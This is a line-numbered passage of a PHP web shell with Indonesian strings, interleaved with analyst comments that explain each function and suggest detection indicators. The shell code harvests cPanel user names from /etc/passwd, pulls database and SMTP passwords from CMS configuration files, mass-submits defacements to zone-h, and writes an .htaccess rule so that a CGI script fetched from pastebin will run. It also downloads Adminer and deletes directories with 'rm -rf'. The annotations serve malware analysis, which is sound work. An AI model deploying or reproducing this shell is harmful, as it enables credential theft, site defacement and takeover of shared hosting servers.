  1730. $_SESSION[$pcp] = "1";
  1731. if($ucp == '' || $pcp == '') {
  1732.  
  1733. } else {
  1734. $i++;
  1735. if(function_exists('posix_getpwuid')) {
  1736. $domain_cp = file_get_contents("/etc/named.conf");
  1737. if($domain_cp == '') {
  1738. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  1739. } else {
  1740. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1741. foreach($domains_cp[1] as $dj) {
  1742. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1743. $user_cp_url = $user_cp_url['name'];
  1744. if($user_cp_url == $ucp) {
  1745. $dom = "<a href='http://$dj/' target='_blank'><font color=cyan>$dj</font></a>";
  1746. break;
  1747. }
  1748. }
  1749. }
  1750. } else {
  1751. $dom = "<font color=red>function is Disable by system</font>";
  1752. }
  1753. echo "username (<font color=cyan>$ucp</font>) password (<font color=cyan>$pcp</font>) domain ($dom)<br>";
  1754. }
  1755. }
  1756. }
  1757. }
  1758. }
  1759. if($i == 0) {
  1760. } else {
  1761. echo "<br>sukses nyolong ".$i." Cpanel by <font color=cyan>berandal.</font>";
  1762. }
  1763. } else {
  1764. echo "<center>
  1765. <form method='post'>
  1766. USER: <br>
  1767. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1768. $_usercp = fopen("/etc/passwd","r");
  1769. while($getu = fgets($_usercp)) {
  1770. if($getu == '' || !$_usercp) {
  1771. echo "<font color=red>Can't read /etc/passwd</font>";
  1772. } else {
  1773. preg_match_all("/(.*?):x:/", $getu, $u);
  1774. foreach($u[1] as $user_cp) {
  1775. if(is_dir("/home/$user_cp/public_html")) {
  1776. echo "$user_cp\n";
  1777. }
  1778. }
  1779. }
  1780. }
  1781. echo "</textarea><br>
  1782. PASS: <br>
  1783. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  /**
   * Analyst note: credential-harvesting helper of the "cpanel" action.
   *
   * Walks every regular file directly inside $dir (no recursion), reads it in
   * full and, when a CMS marker string is found, appends the database password
   * taken from that file to a newline-separated list. The list is echoed into
   * the surrounding <textarea name='pass_cp'> without HTML escaping; the
   * function has no return statement, so the caller's second echo prints nothing.
   *
   * ambilkata() is defined outside this excerpt; from its call shape it
   * presumably returns the text between the two marker strings. TODO confirm.
   *
   * Defensive reading: every configuration file the web-server user can read in
   * $dir should be treated as disclosed, and the database passwords in it
   * rotated. The marker strings and extraction delimiters below are stable
   * literals and usable as static signatures for this shell family.
   *
   * @param string $dir directory to scan; the caller passes the shell's current $dir
   */
  1784. function cp_pass($dir) {
  1785. $pass = "";
  1786. $dira = scandir($dir);
  1787. foreach($dira as $dirb) {
  // Only regular files are inspected; sub-directories and "." / ".." are skipped.
  1788. if(!is_file("$dir/$dirb")) continue;
  1789. $ambil = file_get_contents("$dir/$dirb");
  // Branch order matters: the first marker that matches decides which delimiter pair is used.
  1790. if(preg_match("/WordPress/", $ambil)) {
  1791. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1792. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1793. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1794. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1795. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  // The same marker is labelled "Lokomedia" by the auto_edit_user branch of this file.
  1796. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1797. $pass .= ambilkata($ambil,'password = "','"')."\n";
  // The same markers are labelled "OpenCart" by the auto_edit_user branch of this file.
  1798. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1799. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  // NOTE(review): this pattern is a bracket expression anchored at both ends, so it
  // matches only a subject that is a single one of those letters; when assessing
  // exposure from this exact sample, treat the branch as effectively dead.
  1800. } elseif(preg_match("/^[client]$/", $ambil)) {
  1801. preg_match("/password=(.*?)/", $ambil, $pass1);
  1802. if(preg_match('/"/', $pass1[1])) {
  1803. $pass1[1] = str_replace('"', "", $pass1[1]);
  1804. $pass .= $pass1[1]."\n";
  1805. } else {
  1806. $pass .= $pass1[1]."\n";
  1807. }
  // presumably a WHMCS configuration file (cc_encryption_hash); verify against the host's software.
  1808. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1809. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1810. }
  1811. }
  // Output goes straight into the HTTP response; nothing is written to disk by this function.
  1812. echo $pass;
  1813. }
  1814. $cp_pass = cp_pass($dir);
  1815. echo $cp_pass;
  1816. echo "</textarea><br>
  1817. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1818. </form>
  1819. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1820. }
  1821. } elseif($_GET['do'] == 'smtp') {
  1822. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  /**
   * Analyst note: SMTP-credential disclosure helper of the "smtp" action.
   *
   * Reads every regular file directly inside $dir, removes all "$" characters
   * from the content, and for files containing "JConfig" or "joomla" prints the
   * six Joomla mail settings (host, port, user, password, auth, secure) into the
   * HTML response. Values are echoed without HTML escaping. Nothing is returned,
   * so the caller's `echo $smpt_hunter` prints nothing further.
   *
   * ambilkata() is defined outside this excerpt; presumably it returns the text
   * between the two marker strings. TODO confirm.
   *
   * Defensive reading: if this shell was reachable, the SMTP account in any
   * Joomla configuration under $dir should be considered disclosed; rotate it
   * and review outbound mail volume for that account.
   *
   * @param string $dir directory to scan; the caller passes the shell's current $dir
   */
  1823. function scj($dir) {
  1824. $dira = scandir($dir);
  1825. foreach($dira as $dirb) {
  1826. if(!is_file("$dir/$dirb")) continue;
  1827. $ambil = file_get_contents("$dir/$dirb");
  // Stripping "$" turns `$smtphost = '...'` into `smtphost = '...'`, which is what the delimiters below look for.
  1828. $ambil = str_replace("$", "", $ambil);
  1829. if(preg_match("/JConfig|joomla/", $ambil)) {
  1830. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1831. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1832. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1833. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1834. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1835. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  // The credentials are only rendered in the response; this function stores nothing locally.
  1836. echo "SMTP Host: <font color=cyan>$smtp_host</font><br>";
  1837. echo "SMTP port: <font color=cyan>$smtp_port</font><br>";
  1838. echo "SMTP user: <font color=cyan>$smtp_user</font><br>";
  1839. echo "SMTP pass: <font color=cyan>$smtp_pass</font><br>";
  1840. echo "SMTP auth: <font color=cyan>$smtp_auth</font><br>";
  1841. echo "SMTP secure: <font color=cyan>$smtp_secure</font><br><br>";
  1842. }
  1843. }
  1844. }
  1845. $smpt_hunter = scj($dir);
  1846. echo $smpt_hunter;
  1847. } elseif($_GET['do'] == 'zoneh') {
  1848. if($_POST['submit']) {
  1849. $domain = explode("\r\n", $_POST['url']);
  1850. $nick = $_POST['nick'];
  1851. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1852. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  /**
   * Analyst note: defacement-notification helper of the "zoneh" action.
   *
   * Sends one HTTP POST from the compromised host to the zone-h.com
   * "notify/single" endpoint and returns the response body as a string (false
   * on cURL failure). The enclosing branch fills both arguments from $_POST and
   * interpolates them into the form body without URL-encoding.
   *
   * Defensive reading: an outbound POST to this endpoint originating from a web
   * server is a strong indicator that the site has been, or is about to be,
   * defaced; it is a useful egress-proxy or firewall detection. The function is
   * declared inside the branch, so it exists only after that branch has run.
   *
   * @param string $url  domain submitted as `domain1`
   * @param string $nick value submitted as `defacer`
   * @return string|bool response body, or false when the request fails
   */
  1853. function zoneh($url,$nick) {
  1854. $ch = curl_init("http://www.zone-h.com/notify/single");
  1855. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1856. curl_setopt($ch, CURLOPT_POST, true);
  1857. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1858. return curl_exec($ch);
  // Unreachable: the return above exits first, so the handle is never closed explicitly.
  1859. curl_close($ch);
  1860. }
  1861. foreach($domain as $url) {
  1862. $zoneh = zoneh($url,$nick);
  1863. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1864. echo "$url -> <font color=cyan>OK</font><br>";
  1865. } else {
  1866. echo "$url -> <font color=red>ERROR</font><br>";
  1867. }
  1868. }
  1869. } else {
  1870. echo "<center><form method='post'>
  1871. <u>Defacer</u>: <br>
  1872. <input type='text' name='nick' size='50' value='berandal'><br>
  1873. <u>Domains</u>: <br>
  1874. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1875. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1876. </form>";
  1877. }
  1878. echo "</center>";
  1879. } elseif($_GET['do'] == 'cgi') {
  1880. $cgi_dir = mkdir('berandal_cgi', 0755);
  1881. $file_cgi = "berandal_cgi/cgi.izo";
  1882. $isi_htcgi = "AddHandler cgi-script .izo";
  1883. $htcgi = fopen(".htaccess", "w");
  1884. fwrite($htcgi, $isi_htcgi);
  1885. fclose($htcgi);
  1886. $cgi_script = getsource("https://pastebin.com/raw/3mW2wa7a");
  1887. $cgi = fopen($file_cgi, "w");
  1888. fwrite($cgi, $cgi_script);
  1889. fclose($cgi);
  1890. chmod($file_cgi, 0755);
  1891. echo "<iframe src='berandal_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1892. } elseif($_GET['do'] == 'fake_root') {
  1893. ob_start();
  1894. $cwd = getcwd();
  1895. $ambil_user = explode("/", $cwd);
  1896. $user = $ambil_user[2];
  1897. if($_POST['reverse']) {
  1898. $site = explode("\r\n", $_POST['url']);
  1899. $file = $_POST['file'];
  1900. foreach($site as $url) {
  1901. $cek = getsource("$url/~$user/$file");
  1902. if(preg_match("/hacked/i", $cek)) {
  1903. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=cyan>Fake Root!</font><br>";
  1904. }
  1905. }
  1906. } else {
  1907. echo "<center><form method='post'>
  1908. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1909. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1910. Domain: <br>
  1911. <textarea style='width: 450px; height: 250px;' name='url'>";
  1912. reverse($_SERVER['HTTP_HOST']);
  1913. echo "</textarea><br>
  1914. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1915. </form><br>
  1916. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1917. }
  1918. } elseif($_GET['do'] == 'adminer') {
  1919. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  /**
   * Analyst note: file-download helper of the "adminer" action.
   *
   * Opens $isi for writing (truncating any existing file) and fetches $url into
   * it with cURL, with TLS peer verification switched off. Returns the result
   * of curl_exec(). The only call visible in this file downloads Adminer 4.2.4
   * to "adminer.php" in the shell's working directory.
   *
   * Defensive reading: an adminer.php that the site owner did not install,
   * sitting in a web-writable directory, is a file-system indicator for this
   * shell. Because verification is disabled, the downloaded content is not
   * authenticated and should not be trusted to be the upstream release.
   *
   * @param string $url  remote file to fetch
   * @param string $isi  local path that receives the download
   * @return mixed value returned by curl_exec()
   */
  1920. function adminer($url, $isi) {
  // Mode "w": the target file is created or emptied before the transfer starts.
  1921. $fp = fopen($isi, "w");
  1922. $ch = curl_init();
  1923. curl_setopt($ch, CURLOPT_URL, $url);
  1924. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1925. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  // Certificate checking is disabled for this request.
  1926. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1927. curl_setopt($ch, CURLOPT_FILE, $fp);
  1928. return curl_exec($ch);
  // Everything below is unreachable: neither the cURL handle nor $fp is closed explicitly.
  1929. curl_close($ch);
  1930. fclose($fp);
  1931. ob_flush();
  1932. flush();
  1933. }
  1934. if(file_exists('adminer.php')) {
  1935. echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1936. } else {
  1937. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1938. echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1939. } else {
  1940. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1941. }
  1942. }
  1943. } elseif($_GET['do'] == 'phinfo')
  1944. {@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div>";}
  1945. elseif($_GET['act'] == 'newfile') {
  1946. if($_POST['new_save_file']) {
  1947. $newfile = htmlspecialchars($_POST['newfile']);
  1948. $fopen = fopen($newfile, "a+");
  1949. if($fopen) {
  1950. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1951. } else {
  1952. $act = "<font color=red>permission denied</font>";
  1953. }
  1954. }
  1955. echo $act;
  1956. echo "<form method='post'>
  1957. Filename: <input type='text' name='newfile' value='$dir/asu.php' style='width: 450px;' height='10'>
  1958. <input type='submit' name='new_save_file' value='Submit'>
  1959. </form>";
  1960. } elseif($_GET['act'] == 'newfolder') {
  1961. if($_POST['new_save_folder']) {
  1962. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1963. if(!mkdir($new_folder)) {
  1964. $act = "<font color=red>permission denied</font>";
  1965. } else {
  1966. $act = "<script>window.location='?dir=".$dir."';</script>";
  1967. }
  1968. }
  1969. echo $act;
  1970. echo "<form method='post'>
  1971. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1972. <input type='submit' name='new_save_folder' value='Submit'>
  1973. </form>";
  1974. } elseif($_GET['act'] == 'rename_dir') {
  1975. if($_POST['dir_rename']) {
  1976. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1977. if($dir_rename) {
  1978. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1979. } else {
  1980. $act = "<font color=red>permission denied</font>";
  1981. }
  1982. echo "".$act."<br>";
  1983. }
  1984. echo "<form method='post'>
  1985. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1986. <input type='submit' name='dir_rename' value='rename'>
  1987. </form>";
  1988. } elseif($_GET['act'] == 'delete_dir') {
  1989. if(is_dir($dir)) {
  1990. if(is_writable($dir)) {
  1991. @rmdir($dir);
  1992. @exe("rm -rf $dir");
  1993. @exe("rmdir /s /q $dir");
  1994. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1995. } else {
  1996. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1997. }
  1998. }
  1999. echo $act;
  2000. } elseif($_GET['act'] == 'view') {
  2001. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2002. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2003. } elseif($_GET['act'] == 'edit') {
  2004. if($_POST['save']) {
  2005. $save = file_put_contents($_GET['file'], $_POST['src']);
  2006. if($save) {
  2007. $act = "<font color=cyan>Saved!</font>";
  2008. } else {
  2009. $act = "<font color=red>permission denied</font>";
  2010. }
  2011. echo "".$act."<br>";
  2012. }
  2013. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2014. echo "<form method='post'>
  2015. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2016. <input type='submit' value='Save' name='save' style='width: 500px;'>
  2017. </form>";
  2018. } elseif($_GET['act'] == 'rename') {
  2019. if($_POST['do_rename']) {
  2020. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2021. if($rename) {
  2022. $act = "<script>window.location='?dir=".$dir."';</script>";
  2023. } else {
  2024. $act = "<font color=red>permission denied</font>";
  2025. }
  2026. echo "".$act."<br>";
  2027. }
  2028. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2029. echo "<form method='post'>
  2030. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2031. <input type='submit' name='do_rename' value='rename'>
  2032. </form>";
  2033. } elseif($_GET['act'] == 'delete') {
  2034. $delete = unlink($_GET['file']);
  2035. if($delete) {
  2036. $act = "<script>window.location='?dir=".$dir."';</script>";
  2037. } else {
  2038. $act = "<font color=red>permission denied</font>";
  2039. }
  2040. echo $act;
  2041. } else {
  2042. if(is_dir($dir) === true) {
  2043. if(!is_readable($dir)) {
  2044. echo "<font color=red>can't open directory. ( not readable )</font>";
  2045. } else {
  2046. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2047. <tr>
  2048. <th class="th_home"><center>Name</center></th>
  2049. <th class="th_home"><center>Type</center></th>
  2050. <th class="th_home"><center>Size</center></th>
  2051. <th class="th_home"><center>Last Modified</center></th>
  2052. <th class="th_home"><center>Owner/Group</center></th>
  2053. <th class="th_home"><center>Permission</center></th>
  2054. <th class="th_home"><center>Action</center></th>
  2055. </tr>';
  2056. $scandir = scandir($dir);
  2057. foreach($scandir as $dirx) {
  2058. $dtype = filetype("$dir/$dirx");
  2059. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2060. if(function_exists('posix_getpwuid')) {
  2061. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2062. $downer = $downer['name'];
  2063. } else {
  2064. //$downer = $uid;
  2065. $downer = fileowner("$dir/$dirx");
  2066. }
  2067. if(function_exists('posix_getgrgid')) {
  2068. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2069. $dgrp = $dgrp['name'];
  2070. } else {
  2071. $dgrp = filegroup("$dir/$dirx");
  2072. }
  2073. if(!is_dir("$dir/$dirx")) continue;
  2074. if($dirx === '..') {
  2075. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2076. } elseif($dirx === '.') {
  2077. $href = "<a href='?dir=$dir'>$dirx</a>";
  2078. } else {
  2079. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2080. }
  2081. if($dirx === '.' || $dirx === '..') {
  2082. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2083. } else {
  2084. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2085. }
  2086. echo "<tr>";
  2087. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2088. echo "<td class='td_home'><center>$dtype</center></td>";
  2089. echo "<td class='td_home'><center>-</center></th></td>";
  2090. echo "<td class='td_home'><center>$dtime</center></td>";
  2091. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2092. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2093. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2094. echo "</tr>";
  2095. }
  2096. }
  2097. } else {
  2098. echo "<font color=red>can't open directory.</font>";
  2099. }
  2100. foreach($scandir as $file) {
  2101. $ftype = filetype("$dir/$file");
  2102. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2103. $size = filesize("$dir/$file")/1024;
  2104. $size = round($size,3);
  2105. if(function_exists('posix_getpwuid')) {
  2106. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2107. $fowner = $fowner['name'];
  2108. } else {
  2109. //$downer = $uid;
  2110. $fowner = fileowner("$dir/$file");
  2111. }
  2112. if(function_exists('posix_getgrgid')) {
  2113. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2114. $fgrp = $fgrp['name'];
  2115. } else {
  2116. $fgrp = filegroup("$dir/$file");
  2117. }
  2118. if($size > 1024) {
  2119. $size = round($size/1024,2). 'MB';
  2120. } else {
  2121. $size = $size. 'KB';
  2122. }
  2123. if(!is_file("$dir/$file")) continue;
  2124. echo "<tr>";
  2125. echo "<td class='td_home'><img src='data:image/png;base64,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'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2126. echo "<td class='td_home'><center>$ftype</center></td>";
  2127. echo "<td class='td_home'><center>$size</center></td>";
  2128. echo "<td class='td_home'><center>$ftime</center></td>";
  2129. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2130. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2131. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2132. echo "</tr>";
  2133. }
  2134. echo "</table>";
  2135. if(!is_readable($dir)) {
  2136. //
  2137. } else {
  2138. echo "<hr>";
  2139. }
  2140. echo "<center>Copyright &copy; ".date("Y")." - <a href='https://www.facebook.com/rafi.izudin' target='_blank'><font color=cyan>Mana Ku Tau</font></a></center>";
  2141. }
  2142. ?>
  2143. </html>